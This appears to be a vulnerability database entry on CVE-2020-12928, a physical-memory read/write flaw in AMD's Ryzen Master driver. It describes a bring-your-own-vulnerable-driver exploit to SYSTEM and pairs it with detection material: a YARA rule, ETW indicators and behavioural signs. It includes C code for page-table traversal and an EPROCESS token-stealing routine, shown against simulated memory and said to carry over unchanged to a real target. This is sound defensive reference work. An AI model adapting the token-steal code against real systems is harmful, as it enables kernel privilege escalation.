CVE-2020-12928
AMD Ryzen Master — arbitrary physical memory read/write via IOCTL
Summary
| Field | Value |
|---|---|
| Driver | AMDRyzenMasterDriver.sys |
| Vendor | AMD |
| Vulnerability Class | Arbitrary R/W / Physical Memory Mapping |
| Abused Version | Versions prior to 2.2.0.0 |
| Status | Patched — updated driver removes unrestricted memory access IOCTLs |
| Exploited ITW | No |
BYOVD Context
- Driver signing: Authenticode-signed by Advanced Micro Devices with valid certificate
- Vulnerable Driver Blocklist: Older versions included in Microsoft's recommended driver block rules
- HVCI behavior: Older versions blocked on HVCI-enabled systems
- KDU integration: Not integrated
- LOLDrivers: Listed at loldrivers.io
Affected IOCTLs
- Arbitrary physical memory read via MmMapIoSpace
- Arbitrary physical memory write via MmMapIoSpace
Root Cause
AMDRyzenMasterDriver.sys is the kernel component of AMD Ryzen Master, a CPU overclocking and monitoring utility for AMD Ryzen processors. The driver exposes IOCTLs that map physical memory with MmMapIoSpace so the user-mode tool can read and write hardware registers for CPU tuning. The physical address passed to MmMapIoSpace is taken directly from the IOCTL input and is never checked against the register ranges the tool legitimately needs, so any caller who can open the device can map, read and write any physical page, including kernel code and data, not just AMD CPU-specific registers.
h0mbre published a detailed writeup documenting the discovery process, reverse engineering of the IOCTL dispatch, and complete exploitation to SYSTEM privilege escalation.
Exploitation
h0mbre's exploitation approach:
- Load the AMDRyzenMasterDriver.sys driver
- Open the device handle
- Use the physical memory read IOCTL to traverse page tables
- Locate the EPROCESS structure for the current process and SYSTEM process
- Use the physical memory write IOCTL to copy the SYSTEM token to the current process
- The process now runs as SYSTEM
The writeup demonstrates a clean, methodical exploitation of the physical memory mapping primitive.
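The two memory-access steps above (page-table traversal, then the token copy) as an added worked example written for this page; it is not h0mbre's proof of concept and contains nothing from AMD. The driver's IOCTL codes and buffer layout are not reproduced: the read/write primitive is abstracted behind function pointers and, for an offline run, backed by a constructed in-memory buffer holding a hand-built 4-level paging hierarchy. CR3, the two EPROCESS virtual addresses and the EPROCESS.Token offset (0x4B8) are inputs the real exploit has to obtain separately; the values below are constructed placeholders, not real Windows values.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Physical read/write primitive. In the real exploit these wrap the driver's
 * MmMapIoSpace IOCTLs (codes and buffer layout not reproduced here). */
typedef bool (*phys_read_fn)(uint64_t pa, void *buf, size_t len);
typedef bool (*phys_write_fn)(uint64_t pa, const void *buf, size_t len);

/* Constructed stand-in for physical RAM: 16 pages, page N lives at PA N*0x1000. */
#define PAGE_SIZE 0x1000ULL
#define FAKE_PAGES 16
static uint8_t g_phys[FAKE_PAGES * PAGE_SIZE];

static bool fake_read(uint64_t pa, void *buf, size_t len) {
    if (pa > sizeof g_phys || len > sizeof g_phys - pa) return false;
    memcpy(buf, g_phys + pa, len);
    return true;
}
static bool fake_write(uint64_t pa, const void *buf, size_t len) {
    if (pa > sizeof g_phys || len > sizeof g_phys - pa) return false;
    memcpy(g_phys + pa, buf, len);
    return true;
}

/* x64 4-level paging: the entry bits the walk needs. */
#define PTE_PRESENT 0x01ULL
#define PTE_RW      0x02ULL
#define PTE_LARGE   0x80ULL               /* 1 GiB page at PDPT level, 2 MiB at PD level */
#define PFN_MASK    0x000FFFFFFFFFF000ULL

/* Translate a virtual address to a physical one using only physical reads,
 * which is how the exploit reaches kernel structures through the primitive. */
bool va_to_pa(phys_read_fn rd, uint64_t cr3, uint64_t va, uint64_t *pa) {
    static const int shift[4] = { 39, 30, 21, 12 };   /* PML4, PDPT, PD, PT */
    uint64_t table = cr3 & PFN_MASK, entry;
    for (int lvl = 0; lvl < 4; lvl++) {
        uint64_t idx = (va >> shift[lvl]) & 0x1FF;
        if (!rd(table + idx * 8, &entry, sizeof entry) || !(entry & PTE_PRESENT))
            return false;                              /* not mapped */
        if (lvl == 3 || (lvl >= 1 && (entry & PTE_LARGE))) {
            uint64_t off_mask = (1ULL << shift[lvl]) - 1;   /* 4K, 2M or 1G page */
            *pa = (entry & PFN_MASK & ~off_mask) | (va & off_mask);
            return true;
        }
        table = entry & PFN_MASK;                      /* descend one level */
    }
    return false;
}

/* Convenience wrappers returning values rather than out-params. */
uint64_t pa_of(phys_read_fn rd, uint64_t cr3, uint64_t va) {
    uint64_t pa;
    return va_to_pa(rd, cr3, va, &pa) ? pa : ~0ULL;
}
uint64_t read_qword(phys_read_fn rd, uint64_t cr3, uint64_t va) {
    uint64_t pa, v = 0;
    if (va_to_pa(rd, cr3, va, &pa)) rd(pa, &v, sizeof v);
    return v;
}

/* Token steal over physical memory: read SYSTEM's EPROCESS.Token (an EX_FAST_REF,
 * copied whole) and write it over the target's. token_off is the build-specific
 * EPROCESS.Token offset; assumption: the caller has determined it for the target. */
bool steal_token(phys_read_fn rd, phys_write_fn wr, uint64_t cr3,
                 uint64_t system_eproc, uint64_t target_eproc, uint64_t token_off) {
    uint64_t src_pa, dst_pa, token;
    if (!va_to_pa(rd, cr3, system_eproc + token_off, &src_pa)) return false;
    if (!va_to_pa(rd, cr3, target_eproc + token_off, &dst_pa)) return false;
    if (!rd(src_pa, &token, sizeof token)) return false;
    return wr(dst_pa, &token, sizeof token);
}

/* Constructed layout (not a real Windows image): page 0 PML4, 1 PDPT, 2 PD, 3 PT,
 * 4 "SYSTEM" EPROCESS, 5 target EPROCESS. PD[1] additionally maps a 2 MiB large
 * page at physical 0 so the large-page path of the walk is exercised. */
#define FAKE_CR3          0x0ULL
#define FAKE_TOKEN_OFF    0x4B8ULL                 /* placeholder offset */
#define FAKE_SYSTEM_EPROC 0xFFFFF80000004000ULL    /* PML4[0x1F0] PDPT[0] PD[0] PT[4] */
#define FAKE_TARGET_EPROC 0xFFFFF80000005000ULL    /* ... PT[5] */
#define FAKE_SYSTEM_TOKEN 0xFFFFB10000000007ULL    /* constructed EX_FAST_REF value */
#define FAKE_TARGET_TOKEN 0xFFFFB10000001007ULL

static void put(uint64_t pa, uint64_t v) { memcpy(g_phys + pa, &v, sizeof v); }

void setup_fake_memory(void) {
    memset(g_phys, 0, sizeof g_phys);
    put(0 * PAGE_SIZE + 0x1F0 * 8, 1 * PAGE_SIZE | PTE_PRESENT | PTE_RW);
    put(1 * PAGE_SIZE + 0 * 8,     2 * PAGE_SIZE | PTE_PRESENT | PTE_RW);
    put(2 * PAGE_SIZE + 0 * 8,     3 * PAGE_SIZE | PTE_PRESENT | PTE_RW);
    put(2 * PAGE_SIZE + 1 * 8,     0 | PTE_PRESENT | PTE_RW | PTE_LARGE);
    put(3 * PAGE_SIZE + 4 * 8,     4 * PAGE_SIZE | PTE_PRESENT | PTE_RW);
    put(3 * PAGE_SIZE + 5 * 8,     5 * PAGE_SIZE | PTE_PRESENT | PTE_RW);
    put(4 * PAGE_SIZE + FAKE_TOKEN_OFF, FAKE_SYSTEM_TOKEN);
    put(5 * PAGE_SIZE + FAKE_TOKEN_OFF, FAKE_TARGET_TOKEN);
}

int main(void) {
    setup_fake_memory();
    uint64_t before = read_qword(fake_read, FAKE_CR3, FAKE_TARGET_EPROC + FAKE_TOKEN_OFF);
    bool ok = steal_token(fake_read, fake_write, FAKE_CR3,
                          FAKE_SYSTEM_EPROC, FAKE_TARGET_EPROC, FAKE_TOKEN_OFF);
    uint64_t after = read_qword(fake_read, FAKE_CR3, FAKE_TARGET_EPROC + FAKE_TOKEN_OFF);
    printf("target token before %#llx, after %#llx (%s)\n",
           (unsigned long long)before, (unsigned long long)after, ok ? "ok" : "failed");
    return (ok && after == FAKE_SYSTEM_TOKEN) ? 0 : 1;
}
```

Against a real target the two function pointers would be replaced by wrappers around the driver's IOCTLs, and CR3, the SYSTEM and current EPROCESS addresses and the Token offset would come from the reconnaissance steps the writeup describes; the walk and the copy themselves do not change. The bounds checks in the fake primitives stand in for the failure case a real mapping request can hit when the address is outside RAM.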
Detection
YARA Rule
rule CVE_2020_12928_AMDRyzenMaster {
meta:
description = "Detects vulnerable AMD Ryzen Master driver"
cve = "CVE-2020-12928"
author = "KernelSight"
severity = "high"
strings:
$mz = { 4D 5A }
$driver_name = "AMDRyzenMasterDriver" wide ascii nocase
$amd = "Advanced Micro Devices" wide ascii
$ryzen = "RyzenMaster" wide ascii nocase
condition:
$mz at 0 and ($driver_name or $ryzen) and $amd
}
The rule keys on the driver name and vendor strings only, so it also matches patched builds of AMDRyzenMasterDriver.sys (2.2.0.0 and later); treat a hit as an inventory signal and confirm the file version or hash before acting on it.
ETW Indicators
| Provider | Event / Signal | Relevance |
|---|---|---|
| Microsoft-Windows-Kernel-File | Driver load event | Detects loading of AMDRyzenMasterDriver.sys |
| Sysmon | Event ID 6 — Driver loaded | Hash and signature capture |
| Microsoft-Windows-Security-Auditing | Event 4697 — Service installed | Driver service creation |
| Microsoft-Windows-Kernel-Process | Process token modification | Post-exploitation token swap |
Behavioral Indicators
- Loading of older AMDRyzenMasterDriver.sys versions (pre-2.2.0.0) outside an AMD Ryzen Master installation
- Physical memory mapping IOCTLs targeting non-CPU-register physical addresses
- Page table traversal patterns in physical memory read sequences
- Privilege escalation following AMD driver interaction